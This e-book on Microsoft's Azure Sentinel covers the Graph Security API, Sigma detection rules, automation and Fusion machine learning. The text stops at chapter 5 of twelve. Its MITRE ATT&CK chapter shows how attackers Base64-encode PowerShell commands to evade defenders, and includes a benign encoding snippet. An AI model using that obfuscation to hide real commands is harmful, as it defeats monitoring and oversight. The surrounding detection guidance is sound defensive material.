E-book. Azure Sentinel Cloud-native security: a comprehensive overview of Microsoft’s cloud SIEM

Wortell Enterprise Security, Maarten Goet

Table of Contents

1. Not your daddy’s Splunk
2. Graph Security API
3. MITRE ATT&CK and Sigma
4. Automating Azure Sentinel
5. Machine Learning
6. Dashboarding
7. Investigation
8. Threat hunting in the cloud
9. Malware analysis
10. Design Considerations
11. Access and authorization
12. Putting it all together
    Use Case 1: Detect DNS tunneling
    Use Case 2: Detect CVE-2019-0708 aka BlueKeep
    Use Case 3: Detect CurveBall

1. Not your daddy’s Splunk.

OK, I must admit: the title of this chapter is misleading. I am not going to do a side-by-side comparison of Splunk and Azure Sentinel, although that seems to be the thing people on social media are talking about these days: how does Azure Sentinel compare to other SIEM solutions such as Splunk?

Instead, I’ll be focusing on what role Azure Sentinel plays in securing your enterprise. And while Azure Sentinel does provide the advanced SIEM capabilities and dashboarding that many companies need, I really want you to understand the broader picture, because Azure Sentinel, as a cloud security solution, is set to disrupt the SOC.

And with Microsoft owning and operating a big part of the technology you use every day in your workplace, along with making security a strategic investment and bet, I argue that they are becoming the biggest security company in the world.

1.1 Biggest security company in the world

Microsoft has been investing heavily in security in recent years. Not only have they upped their game in finding and fixing product defects, they also have, for instance, a big organizational unit around threat intelligence (the Microsoft Threat Intelligence Center). They are investing tens if not hundreds of millions in developing security products and solutions for their platforms.

And while one could argue that the early days of their AV solution were not watertight, they certainly turned that “ship” around, and Microsoft should not be underestimated when they take security seriously. If you look at their evolved EDR solution today, Windows Defender is not only achieving high scores, it also detects bad actors in ways, and at a speed, that other vendors do not and cannot match.

Because Microsoft owns one of the two biggest cloud platforms in the world, as well as selling the most used cloud endpoint (Windows), they are poised to become the biggest security player in the world. On top of this, they can leverage their immense computing power to use machine learning and artificial intelligence to really make a difference in how security is approached.

You see this coming to life when you connect Microsoft Defender to their Azure cloud; you start to receive threat intelligence feeds, and new malware is detected and remediated through machine learning in under 14 minutes (the example of the Bad Rabbit malware). This is why Defender ATP has seen strong growth in enterprise adoption in recent months.

1.2 Traditional SIEMs and the cloud: a sour-sweet combination

By now, you know that Microsoft has an EDR solution called Microsoft Defender. But it has many more offerings. For instance, they also have specific solutions for protecting your valuable data, such as Cloud App Security and Office 365 ATP. They can protect your identity with Azure AD and Azure ATP. Microsoft also has Azure Security Center to protect the assets that run on Azure, and there are many more security solutions in their portfolio.

One thing that seemed to be lacking was a central orchestrator. A coordinator for all your security efforts. Something that ties this all together.

In the past years, enterprises would hook up the alerts that Microsoft security solutions were generating and forward them to their on-premise SIEM solution as part of their cloud security strategy. But those SIEMs are struggling to keep pace with the increasing volume and variety of data they process. Unhappy users complain about the inability of their SIEMs to scale and the volume of alerts they must investigate.

Enterprises struggling with the cost of data analysis and log storage often turn to open source tools like Elasticsearch, Logstash, and Kibana (ELK) or Hadoop to build their own on-premise data lakes. However, to gain useful insight from the data they collect, they realize the expense of building and administering these “free” tools is just as great as the cost of commercial tools.

1.3 Sentinel, orchestrating your security efforts

This is where Azure Sentinel comes in; a central place to analyze your security data, across all parts of your environment. Cloud security solutions like Azure Sentinel are set to disrupt the SOC, Forrester concluded during the RSA conference in 2019:

“This week, as thousands of security pros gather in San Francisco for RSA, tech titans Microsoft and Google (Alphabet) launch cyber security tools that promise to disrupt the traditional way of taking in and analyzing security telemetry. Chronicle Backstory (an Alphabet company) and Microsoft Sentinel are cloud-based security analytics tools that are addressing the challenges faced by SOC teams such as:

° Ingesting security data from multi-cloud and on-premise environments
° Analyzing large data volumes
° Alert triage
° Log management and storage
° Threat hunting

Chronicle and Microsoft are making these challenges cloud native with virtually unlimited compute, scale, and storage. These vendors have a unique advantage over legacy on-premise tools since they also own their cloud infrastructures and aren’t dependent on buying cloud at list price from would-be competitors.”

1.4 Connecting any and all clouds

One could be led to think that this will be an all-Microsoft-centered approach. But nothing could be further from the truth. While Microsoft has not confirmed this publicly, they are indeed working with other cloud vendors to get their security data programmatically. If you take a look at the Data Connectors section of Azure Sentinel, you see a connector for AWS CloudTrail.


1.5 The Graph Security API is at the center of this all

In another chapter I write in more detail about the Graph Security API, but here is a summary:

“Microsoft describes the ISG (Intelligent Security Graph) as a way to ‘build solutions that correlate alerts, get context for investigation, and automate security operations in a unified manner’.”

With the release of Azure Sentinel, it really amplifies that strategy and makes it come to life. The Graph Security API is a core piece of Sentinel’s backend to grab the relevant information from other Microsoft services such as Azure ATP, Defender ATP, Azure Security Center, etcetera.

But not only for Microsoft services. Many vendors such as Palo Alto Networks, F5, Symantec, Fortinet and Check Point integrated their solutions into the Graph Security API. Azure Sentinel leverages those technical integrations to get events from the network.

Using the dashboards technology already available in Azure, Sentinel is able to provide you with a single pane of glass on the security of your environment. And because of the graph, it provides detailed out of the box drill-down dashboards for those network vendors, as part of your investigation.


1.6 Azure Firewall is the perfect example

But it doesn’t stop at getting event data from the network. Microsoft released a capability in its own Azure Firewall: threat intelligence-based filtering.

“Azure firewall can now be configured to alert and deny traffic to and from known malicious IP addresses and domains in near real-time. The IP addresses and domains are sourced from the Microsoft Threat Intelligence feed powered by The Microsoft Intelligent Security Graph.”

Threat intelligence-based filtering is enabled by default in alert mode for all Azure Firewall deployments, providing logging of all matching indicators. Customers can adjust the behavior to alert and deny.
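For those who manage firewalls from the command line, switching from the default alert mode to deny can be sketched with the Azure CLI. This is an illustration, not official guidance: the firewall and resource group names are placeholders, and the --threat-intel-mode parameter should be verified against your CLI version:

```shell
# Switch threat intelligence-based filtering from the default Alert mode to Deny.
# "MyFirewall" and "MyResourceGroup" are placeholder names.
az network firewall update \
  --name MyFirewall \
  --resource-group MyResourceGroup \
  --threat-intel-mode Deny
```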

1.7 Democratizing AI: meet Azure Sentinel FUSION

Azure Sentinel features something Microsoft calls FUSION. As Microsoft is looking to democratize Artificial Intelligence, they are making it easy to use machine learning as part of your triage.

Instead of sifting through a sea of alerts and correlating alerts from different products manually, ML technologies will help you quickly get value from the large amounts of security data you are ingesting, and connect the dots for you.

For example, you can quickly see a compromised account that was used to deploy ransomware in a cloud application. This helps reduce noise drastically. In another chapter you can read more about FUSION.

1.8 Security company

I totally agree with Joseph Blankenship:

“For security pros that have been around awhile, don’t let your cynicism block the potential advantages your organization could experience by making use of Azure Sentinel. Take off the tinfoil hat and realize that Microsoft is a security company now. What Google and Microsoft have introduced will make the entire industry better, and that’s something to applaud.

The future of cybersecurity, just like the IT resources it protects, is in the cloud. The Tech Titans are staking out a claim and changing the way security solutions are purchased, delivered, and consumed, and it couldn’t come at a better time for the industry.”

2. Graph Security API.

The dictionary defines a graph as: “a diagram representing a system of connections or interrelations among two or more things by a number of distinctive dots, lines, bars, etc.”. In the context of security, John Lambert (Microsoft’s head of the Threat Intelligence Center) describes it as:

The graph in your network is the set of security dependencies that create equivalence classes among your assets.

“The design of your network, the management of your network, the software and services used on your network, and the behavior of users on your network all influence this graph. Take a domain controller for example. Bob admins the DC from a workstation. If that workstation is not protected as much as the domain controller, the DC can be compromised.

Any other account that is an admin on Bob’s workstation can compromise Bob and the DC. Every one of those admins logs on to one or more other machines in the natural course of business. If attackers compromise any of them, they have a path to compromise the DC.”

A great example of a graph that unveils the ‘shortest path to Domain Admins’ in Active Directory is project BloodHound, a free open-source project created by the specialists of SpecterOps.

2.1 Project Oslo

Almost a decade ago, Microsoft started working on what was codenamed Project “Oslo”. The core focus was to deliver a social and collaborative working application for the Office products, to transform the way people work. To power “Oslo”, Microsoft was developing APIs for Office that would expose the required data programmatically. In early 2014, at its SharePoint conference, Microsoft announced “Oslo” as Office Delve, and the APIs as the Office Graph.

The Office Graph has been extensively used by Office 365 and other Microsoft properties, but has also built a large developer community. Many companies nowadays use the APIs as the primary integration point for their app development.

2.2 Why does this matter to me?

John Lambert clearly describes the need for a graph-based defender mindset:

“A lot of network defense goes wrong before any contact with an adversary, starting with how defenders conceive of the battlefield. Most defenders focus on protecting their assets, prioritizing them, and sorting them by workload and business function. Defenders are awash in lists of assets — in system management services, in asset inventory databases, in BCDR spreadsheets.

There’s one problem with all of this. Defenders don’t have a list of assets — they have a graph. Assets are connected to each other by security relationships. Attackers breach a network by landing somewhere in the graph using a technique such as spear phishing, and they hack, finding vulnerable systems by navigating the graph.”

“Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win.”

2.3 Security Graph API

Early 2018, during Microsoft’s developer conference Build, program manager Sarah Fender announced a preview of what Microsoft would be calling the Graph Security API. This is how she describes it:

“The Graph Security API can be defined as an intermediary service (or broker) that provides a single programmatic interface to connect multiple security providers. Requests to the graph are federated to all applicable providers. The results are aggregated and returned to the requesting application in a common schema.”

This new security-focused API will live alongside the Office Graph.

Later, during Microsoft’s IT Pro focused conference Ignite, the team announced that the Intelligent Security Graph was generally available, and that you could easily access alerts from the following security solutions:

° Azure Active Directory Identity Protection
° Azure Information Protection
° Azure Security Center
° Microsoft Cloud App Security
° Microsoft Intune
° Microsoft Defender ATP

The API also allows you to update alerts: they can be tagged with additional context or threat intelligence to inform response and remediation, comments and feedback can be captured for visibility to other workflows, and alert status and assignments can be kept in sync.
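To make that update flow concrete, here is a hedged PowerShell sketch of updating an alert over the REST endpoint. It assumes $token holds a valid OAuth bearer token for graph.microsoft.com and $alert is an alert previously fetched from /v1.0/security/alerts; check the writable fields against the current alert schema before relying on this:

```powershell
# Assumptions: $token is a bearer token with security alert write consent,
# $alert is an alert object retrieved earlier from /v1.0/security/alerts.
$headers = @{
    Authorization  = "Bearer $token"
    "Content-Type" = "application/json"
}

# Mark the alert as in progress and assign it to an analyst; the API expects
# the alert's original vendorInformation to be echoed back in the body.
$body = @{
    assignedTo        = "analyst@contoso.com"
    status            = "inProgress"
    vendorInformation = $alert.vendorInformation
} | ConvertTo-Json

Invoke-RestMethod -Method Patch -Headers $headers -Body $body `
    -Uri "https://graph.microsoft.com/v1.0/security/alerts/$($alert.id)"
```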

2.4 Windows 10 & Security Graph work in tandem

With the Windows 10 “1709” release, Microsoft introduced a new feature to the newly renamed Windows Defender Application Control (WDAC): the ability to allow any application to run that has obtained a positive application reputation in Microsoft’s Graph Security API. WDAC now comprises most, but not all, of the functionality that used to fall under the label “Device Guard” pre-1709.

WDAC, when integrated with the Graph Security API, could hold the potential to make adoption of application whitelisting much less painful for organizations and individuals, by allowing commonly used Windows programs from reputable publishers to run without the need for specific per-application or per-publisher rules in a whitelisting policy.

2.5 PowerShell

Because the Graph Security API allows for making HTTPS REST API requests, it’s easy to work with the API from PowerShell. Microsoft published a sample on GitHub. To enable Azure PowerShell to query the graph, the module must first be added. This module can be used with locally installed Windows PowerShell and PowerShell Core, or with the Azure PowerShell Docker image.

First step, install the module and authenticate:

° Install the Intelligent Security Graph module from the PowerShell Gallery with Install-Module -Name Az.Security
° Connect to your Azure subscription with Connect-AzAccount
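Spelled out as a single snippet, the two steps look like this (a sketch; the -Scope CurrentUser switch is my addition, to avoid needing administrator rights for the install):

```powershell
# Install the Az.Security module from the PowerShell Gallery (once per machine)
Install-Module -Name Az.Security -Scope CurrentUser

# Sign in; this opens an interactive Azure login prompt
Connect-AzAccount
```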

Next step, query the API:

° Get all the high severity alerts through this query: Get-AzSecurityAlert | Where-Object {$_.ReportedSeverity -eq "High"}

You can also work with the Graph API directly by using the graph.microsoft.com endpoint, for instance to get all the high severity alerts: https://graph.microsoft.com/v1.0/security/alerts?$filter=Severity eq 'High'. Note, there is a Beta endpoint that surfaces even more information about your environment:

° Get the most recent SecureScore through this query: https://graph.microsoft.com/beta/security/secureScores?$top=1

PRO TIP: Use the new Az module for Azure PowerShell. This new module is written from the ground up in .NET Standard. Using .NET Standard allows Azure PowerShell to run under PowerShell 5.x on Windows or PowerShell 6 on any platform, for instance Linux. The Az module is now the intended way to interact with Azure through PowerShell. AzureRM will continue to get bug fixes, but will no longer receive new features.

2.6 Third Parties

Many security companies have begun integrating their solutions with the Microsoft Intelligent Security Graph, for instance:

° Lookout adds mobile device security telemetry into the Microsoft Graph for unique threat detection, protection, visibility and control of iOS and Android devices.
° Demisto integrates with the Security Graph API to enable alert ingestion across sources, rich and correlated threat context, and automated incident response at scale.
° The Palo Alto Networks provider allows applications to access alerts and contextual information from the Application Framework using the Graph Security API.
° Anomali integrates with the Graph Security API to correlate alerts from Microsoft Graph with threat intelligence, providing earlier detection and response to cyber threats.

3. MITRE ATT&CK and Sigma.

PowerShell has continued to gain popularity over the past few years as the framework continues to mature, so it’s no surprise we’re seeing it in more attacks. PowerShell offers attackers a wide range of capabilities natively on the system, and with a quick look at the landscape of malicious PowerShell tools flooding out, you have a decent indicator of its growth.

Enter stage left — the PowerShell ‘-EncodedCommand’ parameter. This parameter is intended to take complex strings that may otherwise cause issues for the command line and wrap them up for PowerShell to execute. By masking the “malicious” part of your command from prying eyes, you can avoid strings that may tip off the defence. MITRE’s ATT&CK framework, Sigma’s open source project and Azure Sentinel can be teamed up to supercharge your defences against these types of attacks. Let’s look at how we can do this.

3.1 Malicious PowerShell usage

Quite a number of droppers use these Base64 encoded PowerShell commands. For instance, they might try and abuse a Word document through a macro that runs cmd.exe, which in turn runs PowerShell.exe, which then parses an encoded command starting with a $.

Here’s a sample PowerShell script for you to try out encoding some sample command yourself:

$Text = '$cmd.exe'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText = [Convert]::ToBase64String($Bytes)
$EncodedText
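Going the other way is just as useful during triage, when you find an encoded command on a process command line and want to see what it actually does. A minimal sketch, using as input the Base64 string that the script above produces for '$cmd.exe':

```powershell
# 'JABjAG0AZAAuAGUAeABlAA==' is the UTF-16LE/Base64 encoding of '$cmd.exe',
# i.e. the output of the encoding sample above
$Encoded = 'JABjAG0AZAAuAGUAeABlAA=='
$Decoded = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Encoded))
$Decoded   # prints: $cmd.exe
```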

3.2 MITRE ATT&CK

One of the first things you might ask yourself is: how do I know which tactics, techniques and procedures (TTPs) my adversaries are using? Unless you’ve been involved with research on bad actors and/or have been working on the “Red” (offensive) side yourself, you might not have all the information available on what people are using to attack you.

This is why the InfoSec community is about sharing information. Each of us might have a piece of the puzzle, and putting them together will provide all of us with the bigger picture, and will allow us to up our defenses in a bigger way. There are numerous conferences, blogs and other ways to get those learnings, but the MITRE ATT&CK project is one well worth mentioning.

What is MITRE ATT&CK? MITRE describes it as:

“MITRE ATT&CK is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations.”

It’s a community project where many people with hands-on experience contribute. For instance, Christiaan Beek, lead at McAfee, actively shares his learnings on TTPs with MITRE.

The information MITRE ATT&CK provides can be consumed in many ways. They provide a website which allows you to search the information, there is an ‘attack navigator’ that gives you an interactive way to work with the TTPs, and there is a programmatic way (an API) to retrieve the information as well.

If we query the ATT&CK framework, we find a TTP with number T1086, called “PowerShell”. MITRE provides information about the attack vector, which APT groups typically use it, and information on which phase of the ‘kill chain’ it maps to: Execution.

Two paragraphs in the TTP information MITRE provides could be of interest to you: Mitigation (how to defend against it) and Detection (monitoring, and possibly hunting):

“[..] If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. [..]”

3.3 Sigma

So you’ve learned about the TTPs that your adversaries might use. But we still need to ‘translate’ this into some real detection logic for our SIEM system. We need to provide the query that the alert rules will use, and/or capture the relevant data to use for hunting later on.

Again, if you have been working on the offensive side, you might already have this information readily available. But most defenders will need to investigate the attack vector and come up with a plan as to which data sources to monitor, what to look for, and how the alerting logic would need to be configured.

And if you do find out what to monitor for, you’ll most likely be configuring it directly in your SIEM configuration, and maybe not first write down the abstract of what you’re trying to achieve. (This is also the reason that replacing a SIEM system is tough; there is no history of why something was configured there in the first place — but that’s a topic for another blog.)

Florian Roth started a community project called Sigma, which aims to provide a generic signature format for SIEM systems. The detection logic is written in YAML format, and these .yml files can then be converted or translated into queries or rules for your specific SIEM system (for instance Azure Sentinel, ArcSight, etc.).

“Sigma is for log files what Snort is for network traffic and YARA is for files.”

The Sigma project has fully embraced MITRE’s ATT&CK framework as a way to classify the attack vector. If you look at the rule specification, in the tags section you’ll find fields called “attack.number” and “attack.tactic”. For our PowerShell TTP this translates to attack.t1086 and attack.execution.

On Sigma’s GitHub repository you’ll find a folder called ‘rules’ that contains quite a number of Sigma rules that Florian, other members of the project, and the broader community have developed and contributed. Under rules, windows, powershell you’ll find a lot of rules for detecting PowerShell attack vectors.

There are many ‘implementations’ of abusing PowerShell, but the one we were looking for is the one that uses Base64 encoded commands. The Sigma rule definition for this one can be found in the repo under the name posh-encoded-detection.yaml.
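To give you a feel for the format before we convert it, here is a minimal, hand-written sketch of such a rule. It follows Sigma's process_creation schema, but it is an illustration, not the literal contents of the repo file:

```yaml
title: Encoded PowerShell Command Line
status: experimental
description: Detects PowerShell launched with a Base64 encoded command
tags:
    - attack.execution
    - attack.t1086
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        Image|endswith: '\powershell.exe'
        CommandLine|contains:
            - '-EncodedCommand'
            - ' -enc '
    condition: selection
falsepositives:
    - Administrative scripts that legitimately use encoded commands
level: medium
```

Note how the tags section carries the ATT&CK classification discussed above, so the mapping from TTP to detection logic travels with the rule.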

3.4 Azure Sentinel

Now that we have the Sigma rule, you will want to put that detection logic into your cloud SIEM, Azure Sentinel. However, we need to take a final step: converting that YAML file into something that Azure Sentinel can read and process.

Guess what, Florian and his team also thought of that! It’s called SIGMAC, as in Sigma Converter. In the tools folder of the GitHub repo you will find it as a Python script. The script can output to a couple of common SIEM formats, for instance Splunk, Kibana, ArcSight, and one that is called “ala”.

The target called ‘ala’ stands for Azure Log Analytics. This is the correct one, as Azure Sentinel uses Azure Log Analytics as its backend, as you can read in the Design Considerations chapter. Choosing ‘ala’ as the target in the Sigma Converter will produce the right KQL query as the result.

If you want to know more about Event ID 4688, which this signature uses, you can have a look at UltimateWindowsSecurity.com and get detailed information.

PRO TIP: Don’t forget to check the basics. Am I collecting the events from the security event logs on my Windows servers? Is auditing properly enabled and configured in the OS? Are my Microsoft Monitoring Agents healthy and reporting into Azure Sentinel?
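To make the result tangible, the kind of Log Analytics query such a conversion yields can be sketched as follows. This is a hand-written illustration rather than SIGMAC's literal output, and it assumes process creation auditing (Event ID 4688 with command-line logging) flowing into the SecurityEvent table:

```
SecurityEvent
| where EventID == 4688
| where CommandLine contains "-EncodedCommand" or CommandLine contains " -enc "
| project TimeGenerated, Computer, Account, NewProcessName, CommandLine
```

A query of this shape is what you would paste into an analytics rule in the next section.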

3.5 Use Case

Open up Azure Sentinel in the Azure portal and click on ‘Analytics’. Select ‘Add’ to create a new rule. Provide a name, description and severity, and paste in the KQL query. In the Alert Simulation section you’ll see if the query would have triggered.

Now sit back and relax, and wait for the rule to kick in when a malicious PowerShell command is run in your environment.

Because you’ve used the Entity Mapping, the alert maps back to the corresponding server, IP address, etcetera, which will assist you in Hunting. Not sure how to do this? Read more details in the chapter on using Jupyter and KQL to go Threat Hunting with Azure Sentinel. Then select the alert scheduling and alert suppression parameters, and save the rule.

PRO TIP: Make sure you select the right fields in the Entity Mapping section, because you will need this later for Hunting.


3.6 Speaking the same language

Having a common open framework and taxonomy around TTPs such as MITRE ATT&CK helps a great deal to organize our defense efforts. Combining that with a generic SIEM format such as Sigma to define the logic needed to detect these TTPs is really helpful. And having a community that actively contributes to these Sigma rules is probably the best thing since sliced bread!

Downloading the alert rules and converting them to be used in Azure Sentinel has never been easier, thanks to the community efforts of MITRE and Sigma.

4. Automating Azure Sentinel.

Over the past months there has been immense interest in Azure Sentinel. Companies, big and small, are looking at Azure Sentinel for multiple reasons: for instance, being burned out from running their own complex SIEM infrastructures, or the easy integration with Azure and Office 365 data that Sentinel provides.

The team at Wortell Enterprise Security has been fortunate to assist customers with proofs of concept, pilots, trials and production deployments. Based on this work they’ve built up quite a bit of field experience and felt it was time to contribute back.

Say hello to the open-source PowerShell module called AzSentinel.

4.1 AzSentinel module

Late 2019, the team at Wortell Enterprise Security created a PowerShell module called AzSentinel. The goal is to provide programmatic access to Azure Sentinel. One of the first things they wanted to support was working with Azure Sentinel ‘rules’.

Rules in Azure Sentinel provide the basic logic on which incidents get created. Currently, the only way to add, change or delete rules is through the Azure portal. As many of you are running a cloud Security Operations Center with many customers connected, doing this manually would be no option.


4.2 Use Cases

The other benefit of having automation is that you can keep the Azure Sentinel instances of your SOC customers synced to a ‘golden repo’. If you’ve defined use cases for various situations, you can now push them almost in real time to your customers, so that their coverage increases when you find new attack vectors.

This is also why Wortell built support for defining the alert rules in YAML. You can add multiple rule definitions in one configuration file as part of your use case. You can find examples in the final chapter.

PRO TIP: Are you looking for sample KQL queries to use in your rules and use cases? Wortell has converted a couple of popular Sigma rules and published some of their own KQL queries in this repo: https://github.com/wortell/KQL

4.3 Working with the module

The module itself requires PowerShell Core 6 or above, the Az module to be installed, and the powershell-yaml module, because we’ll be working with YAML files as input. Other than that, you just need an Azure Sentinel instance.

Wortell is providing the module under the MIT license. This basically means you can use it for whatever you like, as long as you mention them and keep providing the work under MIT as well. And of course: if you work with Azure Sentinel as well, you’re invited to help with the project.

Here’s the link to the GitHub repo: https://github.com/wortell/AZSentinel
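To give a flavor of what working with the module looks like, here is a sketch. The cmdlet names (Import-AzSentinelAlertRule, Get-AzSentinelAlertRule) and their parameters are assumptions based on the repo's documentation at the time of writing and may have changed, so verify them against the current README:

```powershell
# Illustrative sketch; assumes the AzSentinel, Az and powershell-yaml modules are installed
Import-Module AzSentinel

# Push the alert rules defined in a YAML configuration file to a workspace
Import-AzSentinelAlertRule -WorkspaceName "mySentinelWorkspace" `
    -SettingsFile ".\use-case-rules.yaml"

# List the rules now present in that workspace
Get-AzSentinelAlertRule -WorkspaceName "mySentinelWorkspace"
```

Driving rule deployment from a YAML file like this is what makes the 'golden repo' scenario from the previous section practical.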


5. Machine Learning.

With the introduction of Chronicle’s Backstory (Google) and Azure Sentinel, 2019 became the year of the ‘Cloud SIEM’. Why is this important? VisibleRisk summarizes it as:

“because these types of products can flip two decades of “normal” on their head and finally position those who defend our enterprises in a way that they can keep pace with the furious pace of change they face.”

Azure Sentinel leverages the immense compute power of the cloud and sophisticated machine learning models to help defenders in the enterprise. Microsoft calls this Azure Sentinel FUSION.

5.1 Azure Sentinel FUSION? Say what?

If you go to the Overview page in Azure Sentinel, you’ll see in the bottom right corner a section called ‘Democratize ML for your SecOps’. It says:

“Unlock the power of AI for security professionals by leveraging MS cutting edge research and best practices in ML, regardless of your current investment level in ML.”

5.2 Enabling Fusion

There is no UI to enable Fusion; it is enabled by default. However, if you have an instance of Azure Sentinel running, you can use Azure Cloud Shell and the ‘az’ command to disable (or re-enable) Fusion for your Log Analytics workspace.

° Start Azure Cloud Shell
° Run the following command:

az resource update --ids /subscriptions/{Subscription Guid}/resourceGroups/{Log analytics resource Group Name}/providers/Microsoft.OperationalInsights/workspaces/{Log analytics workspace Name}/providers/Microsoft.SecurityInsights/settings/Fusion --api-version 2019-01-01-preview --set properties.IsEnabled=true --subscription "{Subscription Guid}"

5.3 OK, now what?

Great question. Fusion looks at alerts coming from different sources and tries to find out if there’s a connection between them, in order to fuse them into one case with higher confidence.

“Think about having multiple low fidelity alerts that no one had the time to investigate, we tell you if you should investigate them by fusing them into one case.“

Machine Learning in Azure Sentinel is built in right from the beginning. Microsoft has thoughtfully designed the system with ML innovations aimed at making security analysts, security data scientists and engineers productive. One such innovation is Azure Sentinel Fusion, built especially to reduce alert fatigue.

Fusion uses graph-powered machine learning algorithms to correlate between millions of lower fidelity anomalous activities from different products, such as Azure AD Identity Protection and Microsoft Cloud App Security, combining them into a manageable number of interesting security cases.

5.4 Unified SecOps

Not coincidentally, Microsoft announced last year that they are integrating Cloud App Security, Azure ATP and Azure AD Identity Protection into a unified SecOps experience and portal:

“Microsoft has three identity-centric security products offering detection capabilities across on-premise and in the cloud:

° Azure Advanced Threat Protection (Azure ATP) identifies on-premises attacks
° Azure Active Directory Identity Protection (Azure AD Identity Protection) detects and proactively prevents user and sign-in risks to identities in the cloud
° Microsoft Cloud App Security (MCAS) identifies attacks within a cloud session, covering not only Microsoft products but also third-party applications

“We are happy to announce that we have brought these together in a unified SecOps experience, which focuses on identity-based alerts and activities for true hybrid identity threat protection.”

5.5 Based on three pillars

So why are all security vendors adding machine learning and artificial intelligence to their solutions? Well, first of all: sifting through tons of alerts in a SIEM is not something security analysts love doing. Their skill set can also be better put to work hunting for bad actors, based on pre-filtered signals.

Secondly, it is well known that security analysts are drowning in those alerts and sometimes miss the critical piece needed to launch the next step of an investigation. In fact, Mark Russinovich laid out Microsoft’s strategy for dealing with this three years ago.

Ram Shankar, who leads the Azure Sentinel FUSION team, wrote that the ML team behind Azure Sentinel FUSION asked three questions:

1) Why are alerts noisy?
2) How do experienced security analysts deal with this?
3) How can we incorporate domain knowledge into the system?

The ML team came up with these three ideas:

1. Probabilistic Kill Chain
Garden-variety detections assume a static kill chain. Not true: real-world attacks are complex and multistage. So, the ML team modeled the probability of moving to the next step as conditioned not only on the previous step but also on factors like the current asset.

2. Iterative attack simulation
A lot of noise looks like legitimate attacks because detections explore only one line of attack. For every alert, the ML team iteratively simulates multiple lines of attack using random-walk style algorithms to evaluate if the attack is truly feasible.

3. Encode domain knowledge as priors!
Incorporating Bayesian methods to tap into experts' domain knowledge is painfully obvious, but the common hurdle is that inference-style algorithms are slow. Not a problem: because Azure Sentinel is a cloud-based SIEM, the ML team can leverage the cloud's scalable compute.

These three ideas form the bedrock of Fusion, which Ram claims has been shown to reduce alert fatigue by 90%.
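As a toy illustration of the first idea, here is a sketch of my own (not Microsoft's actual model) in which the probability that an alert sequence represents a real attack depends on both the previous stage and the asset involved. All probabilities are made-up values:

```python
# Toy "probabilistic kill chain" (NOT the actual Fusion model): the
# chance of an attack advancing to the next stage depends on the
# previous stage AND on a property of the current asset.
# All probabilities below are invented, purely illustrative values.

TRANSITIONS = {
    # (previous_stage, asset_is_high_value) -> P(advance to next stage)
    ("initial_access", False): 0.10,
    ("initial_access", True):  0.30,
    ("lateral_movement", False): 0.05,
    ("lateral_movement", True):  0.40,
}

def path_probability(stages, high_value):
    """Probability that an alert sequence represents a full multistage attack."""
    p = 1.0
    for stage in stages:
        p *= TRANSITIONS[(stage, high_value)]
    return p

# The same alert sequence scores very differently per asset:
low = path_probability(["initial_access", "lateral_movement"], high_value=False)
high = path_probability(["initial_access", "lateral_movement"], high_value=True)
print(low, high)  # roughly 0.005 vs 0.12
```

The point of the toy: the identical alert sequence is over twenty times more "interesting" on a high-value asset, which is exactly the kind of context a static kill chain ignores.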

5.6 In cybersecurity, it's AI vs. AI
Paul Gillin of SiliconANGLE wrote:

“Artificial intelligence research group OpenAI last month made the unusual announcement: It had built an AI-powered content creation engine so sophisticated that it wouldn’t release the full model to developers.

Anyone who works in cybersecurity immediately knew why. Phishing emails, which try to trick recipients into clicking malicious links, originated 91 percent of all cyberattacks in 2016, according to a study by Cofense Inc. Combining software bots to scrape personal information from social networks and public databases with such a powerful content generation engine could produce much more persuasive phishing emails that might even mimic a certain person's writing style, according to Nicolas Kseib, lead data scientist at TruSTAR Technology Inc.

The potential result: cybercriminals could launch phishing attacks much faster and on an unprecedented scale.”

AI is a new weapon that some people believe could finally give security professionals a leg up on their adversaries.

5.7 Azure Sentinel FUSION in action
Going into the Analytics section of Azure Sentinel you'll find a rule called 'Advanced Multistage Attack Detection'. It has the following description:

By using Fusion technology that's based on machine learning, Azure Sentinel can automatically detect multistage attacks by combining anomalous behaviors and suspicious activities that are observed at various stages of the kill chain. Azure Sentinel then generates incidents that would otherwise be very difficult to catch.

By design, these incidents are low volume, high fidelity, and high severity. This is also why this detection is turned ON by default in Azure Sentinel. It will literally be the first active rule in your new Azure Sentinel environment, making the machine learning promise real.

5.8 What does it exactly detect?
The question I get most is: "but what does it exactly detect?". The detections can be categorized in the following buckets:

° Impossible travel to an atypical location followed by anomalous Office 365 activity
° Sign-in activity from an unfamiliar location followed by anomalous Office 365 activity
° Sign-in activity from an infected device followed by anomalous Office 365 activity
° Sign-in activity from an anonymous IP address followed by anomalous Office 365 activity
° Sign-in activity from a user with leaked credentials followed by anomalous Office 365 activity
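To illustrate the "followed by" pattern shared by these buckets, here is a deliberately naive sketch of such pairing logic. The correlation window, user names and rule are all invented for illustration; Fusion's real implementation is far more sophisticated:

```python
from datetime import datetime, timedelta

# Hypothetical simplification of the pairing behind these detections:
# a risky sign-in alone is noise; the SAME user showing anomalous
# Office 365 activity shortly afterwards makes it an incident.
WINDOW = timedelta(hours=4)  # made-up correlation window

signins = [("alice", datetime(2020, 1, 6, 9, 0), "anonymous IP")]
o365_anomalies = [
    ("alice", datetime(2020, 1, 6, 10, 30), "mass download"),
    ("bob",   datetime(2020, 1, 6, 11, 0), "inbox forwarding rule"),
]

incidents = [
    (user, reason, activity)
    for user, t_signin, reason in signins
    for u2, t_act, activity in o365_anomalies
    if u2 == user and timedelta(0) <= t_act - t_signin <= WINDOW
]
print(incidents)  # only alice's correlated pair becomes an incident
```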

Here's a specific example of a detection that the machine learning model would trigger on: an alert is raised indicating a sign-in from an anonymous proxy IP address, after which the user creates or updates an inbox forwarding rule that forwards all incoming email to an external address. This may indicate that the account is compromised, and that the mailbox is being used to exfiltrate information from your organization.

5.9 Connectors
To get the machine learning model to work, it needs to be fed with the 'right' data. In the case of the 'Advanced Multistage Attack Detection' model, it needs data from both Azure Active Directory Identity Protection and Microsoft Cloud App Security.

PRO TIP: Make sure that you have the Azure Active Directory Identity Protection and Microsoft Cloud App Security connectors enabled!

5.10 MITRE ATT&CK
The MITRE ATT&CK framework is a comprehensive matrix of tactics and techniques used by threat hunters, red teamers, and defenders to better classify attacks and assess an organization's risk. You can read more about it in another chapter.

